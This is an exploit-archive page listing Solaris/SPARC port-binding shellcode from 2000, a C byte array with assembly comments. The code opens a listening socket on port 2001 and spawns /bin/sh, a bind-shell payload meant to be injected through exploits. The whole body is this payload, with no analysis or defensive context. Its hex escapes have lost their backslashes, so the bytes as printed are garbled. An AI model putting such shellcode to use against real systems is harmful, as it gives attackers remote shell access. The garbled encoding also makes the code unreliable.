[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : solaris/SPARC portbinding shellcode
# Published : 2000-11-19
# Author : dopesquad.net
# Previous Title : linux chroot()/execve() code
# Next Title : linux/x86 execve /bin/sh toupper() evasion 55 bytes


/*

  Solaris - Sparc -> www.dopesquad.net

*/

char shellcode[] =
  "xa0x23xa0x10"	/* sub    	%sp, 16, %l0 */
  "xaex23x80x10"	/* sub    	%sp, %l0, %l7 */
  "xeex23xbfxec"	/* st     	%l7, [%sp - 20] */
  "x82x05xe0xd6"	/* add    	%l7, 214, %g1 */
  "x90x25xe0x0e"	/* sub    	%l7, 14, %o0 */
  "x92x25xe0x0e"	/* sub    	%l7, 14, %o1 */
  "x94x1cx40x11"	/* xor    	%l1, %l1, %o2 */
  "x96x1cx40x11"	/* xor    	%l1, %l1, %o3 */
  "x98x25xe0x0f"	/* sub    	%l7, 15, %o4 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "xa4x1ax80x08"	/* xor    	%o2, %o0, %l2 */
  "xd2x33xbfxf0"	/* sth    	%o1, [%sp - 16] */
  "xacx10x27xd1"	/* mov    	2001, %l6 */
  "xecx33xbfxf2"	/* sth    	%l6, [%sp - 14] */
  "xc0x23xbfxf4"	/* st     	%g0, [%sp - 12] */
  "x82x05xe0xd8"	/* add    	%l7, 216, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x1axc0x17"	/* xor    	%o3, %l7, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x82x05xe0xd9"	/* add    	%l7, 217, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x25xe0x0b"	/* sub    	%l7, 11, %o1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x82x05xe0xda"	/* add    	%l7, 218, %g1 */
  "x90x1axc0x12"	/* xor    	%o3, %l2, %o0 */
  "x92x1axc0x10"	/* xor    	%o3, %l0, %o1 */
  "x94x23xa0x14"	/* sub    	%sp, 20, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "xa6x1axc0x08"	/* xor    	%o3, %o0, %l3 */
  "x82x05xe0x2e"	/* add    	%l7, 46, %g1 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x01"	/* add    	%o3, 1, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1axc0x13"	/* xor    	%o3, %l3, %o0 */
  "x92x25xe0x07"	/* sub    	%l7, 7, %o1 */
  "x94x02xe0x02"	/* add    	%o3, 2, %o2 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x17"	/* add    	%o3, 23, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x21x0bxd8x9a"	/* sethi  	%hi(0x2f626800), %l0 */
  "xa0x14x21x6e"	/* or     	%l0, 0x16e, %l0	! 0x2f62696e */
  "x23x0bxdcxda"	/* sethi  	%hi(0x2f736800), %l1 */
  "x90x23xa0x10"	/* sub    	%sp, 16, %o0 */
  "x92x23xa0x08"	/* sub    	%sp, 8, %o1 */
  "x94x1bx80x0e"	/* xor    	%sp, %sp, %o2 */
  "xe0x3bxbfxf0"	/* std    	%l0, [%sp - 16] */
  "xd0x23xbfxf8"	/* st     	%o0, [%sp - 8] */
  "xc0x23xbfxfc"	/* st     	%g0, [%sp - 4] */
  "x82x02xe0x3b"	/* add    	%o3, 59, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
  "x90x1bx80x0e"	/* xor    	%sp, %sp, %o0 */
  "x82x02xe0x01"	/* add    	%o3, 1, %g1 */
  "x91xd0x38x08"	/* ta     	0x8 */
;



# www.Syue.com [2000-11-19]